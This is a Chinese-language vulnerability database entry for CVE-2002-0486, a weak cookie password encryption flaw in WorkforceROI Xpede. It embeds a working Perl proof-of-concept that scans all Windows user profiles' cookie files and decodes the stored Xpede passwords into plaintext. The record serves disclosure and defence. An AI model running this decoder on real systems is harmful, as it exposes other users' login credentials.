CVE-2002-0486
CVSS7.2
发布时间 :2002-08-12 00:00:00
修订时间 :2016-11-28 14:06:20
NMCOES    

[原文]Intellisol Xpede 4.1 uses weak encryption to store authentication information in cookies, which could allow local users with access to the cookies to gain privileges.


[CNNVD]WorkforceROI Xpede密码加密算法不强壮漏洞(CNNVD-200208-206)

        
        Intellisol Xpede是一款基于浏览器结合使用的时间和费用,项目成本管理的金融相关系统,运行在Microsoft Windows操作系统平台下。
        Intellisol Xpede由于设计密码算法不够强壮可以导致密码泄露漏洞。
        Intellisol Xpede对用户的密码使用很简单的移位和置换混合算法,攻击者可以方便的还原密码,如果用户获得相关COOKIE就可以利用跨站脚本代码可执行等漏洞获得相关密码信息并解密。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:workforceroi:xpede:4.1
cpe:/a:workforceroi:xpede:7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0486
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0486
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-206
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/263485
(VENDOR_ADVISORY)  BUGTRAQ  20020322 Xpede passwords exposed (2 vuln.)
http://www.securityfocus.com/bid/4344
(VENDOR_ADVISORY)  BID  4344
http://xforce.iss.net/xforce/xfdb/8614
(UNKNOWN)  XF  xpede-password-weak-encryption(8614)

- 漏洞信息

WorkforceROI Xpede密码加密算法不强壮漏洞
高危 设计错误
2002-08-12 00:00:00 2005-10-20 00:00:00
本地  
        
        Intellisol Xpede是一款基于浏览器结合使用的时间和费用,项目成本管理的金融相关系统,运行在Microsoft Windows操作系统平台下。
        Intellisol Xpede由于设计密码算法不够强壮可以导致密码泄露漏洞。
        Intellisol Xpede对用户的密码使用很简单的移位和置换混合算法,攻击者可以方便的还原密码,如果用户获得相关COOKIE就可以利用跨站脚本代码可执行等漏洞获得相关密码信息并解密。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 设置相关安全选项,清除COOKIE信息和修补IE等浏览器防止泄露COOKIE信息。
        厂商补丁:
        WorkforceROI
        ------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.workforceroi.com/index.shtml

- 漏洞信息 (21351)

WorkforceROI Xpede 4.1/7.0 Weak Password Encryption Vulnerability (EDBID:21351)
windows local
2002-03-22 Verified
0 c3rb3r
N/A [点击下载]
source: http://www.securityfocus.com/bid/4344/info

An issue has been reported in Xpede, which could lead to a compromise of user authentication information.

Reportedly, Xpede cookies containing username and password data is stored using a weak encryption method. Therefore if a user obtains access to cookies reisding on a system, he/she may be able to reveal authentication information of Xpede users. 

#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede
passwords stored in these damn cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March
2002
#
#output format

format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.


#Cookie fingerprint
$signature="defPWD";



#decoding stuff
@PERMU=('9', '11', '2', '6', '4', '10', '1', '8', '7', '3', '5');
@ALPHA=
('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O'
, 'P', 'Q', 'R','S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a','b','c','d','
e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y'
,'z');
@SHIFT=(9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);


#Change the following path to match your system
@COOKIE= glob
('c:\winnt\Profiles\*\Cookies\*@*.txt');



$i=$count=0;
@FOUND= ('nope');

print "\n\nXdeep.pl  Xpede cookies finder and decoder
\n\n-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --
\n\n\n";

foreach $try (@COOKIE) {
$count++;
if (open(handle, $try))
{
@lines=<handle>;
if (!index($lines[0], $signature))
{
printf("\n+ Xpede cookie found ! yep :)  <=>  %s\n",
$try);
$FOUND[$i]=$try;
$i++;
}
close(handle);
}

}

printf("\n+ %d files checked.\n", $count);

if (! $i)
{
print "\n\n- No Xpede cookie found, sorry\n\n";
exit(0);
}

printf("\n\n+ %d Cookie(s) found.\n", $i);
print "\n\n\n[Press return]\n";
$try=<STDIN>;

foreach $try (@FOUND) {

if (open(handle, $try))
{
@lines=<handle>;

$userid= @lines[55];
$realname=@lines[64];
$password=@lines[46];
$company=@lines[28];

$realname =~ s/\+/ /;
$userid =~ s/\+/ /;
$password =~ s/\+/ /;
$company =~ s/\+/ /;

$userid =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;
$realname =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;
$password =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;
$company =~ s/%([a-f0-9][a-f0-9])/pack("C", hex
($1))/eig;

printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
write;
print "\n\n! Cr4cking 1n progr3ss ... \n";

@list=split //, $password;




if (length($password) > 12 )
{
$MAX = 11;
$DIFF = length($password)-1-$MAX;
for ($i = 0; $i < ($DIFF); $i++) {$REST = $REST.$list
[$i]; }
splice(@list, 0, ($DIFF));
printf "\n+ Clear part is %s\n", $REST;
}
else {$MAX = length($password)-1;printf "\n- No clear
part found \n";}



for ($i=0; $i<$MAX; $i) { $temp_pass =
$temp_pass.$list[$PERMU[$i++]-1]; }
printf "\n+ Permutations give %s\n", $temp_pass;


@list=split //, $temp_pass;
for ($i=0; $i<$MAX; $i++)
{
$b = ord($list[$i]);
$c = $SHIFT[$i];
$flag=0;


for ($z=0; $z<52; $z+=1)
{
 if (ord($ALPHA[$z]) == $b) { $a = ord($ALPHA
[($z+$c)%52]);$flag=1;}
}

if (!$flag) {$a = $b;}


$decode = $decode.chr($a);
printf "\n+ %s Shift(%d) \t --> \t%s", chr($b), $c, chr
($a);
}

printf "\n\n+ Shifting with secret key give %s\n",
$decode;
printf "\n! Password is \"%s\"\n\n", $decode.$REST;
printf "\n\n- End.\n\n";

$decode=$REST=$temp_pass="";
close(handle);

print "\n\n[Press return]\n";
$try=<STDIN>;
}
}
		

- 漏洞信息

10429
Intellisol Xpede Cookie Information Encryption Weakness
Local Access Required Cryptographic
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2002-03-22 Unknow
2002-03-22 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

WorkforceROI Xpede Weak Password Encryption Vulnerability
Design Error 4344
No Yes
2002-03-22 12:00:00 2009-07-11 11:56:00
Reported by Gregory Duchemin <c3rb3r@hotmail.com>.

- 受影响的程序版本

WorkforceROI Xpede 7.0
WorkforceROI Xpede 4.1

- 漏洞讨论

An issue has been reported in Xpede, which could lead to a compromise of user authentication information.

Reportedly, Xpede cookies containing username and password data is stored using a weak encryption method. Therefore if a user obtains access to cookies reisding on a system, he/she may be able to reveal authentication information of Xpede users.

- 漏洞利用

An exploit has been provided by Gregory Duchemin (c3rb3r@hotmail.com).

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站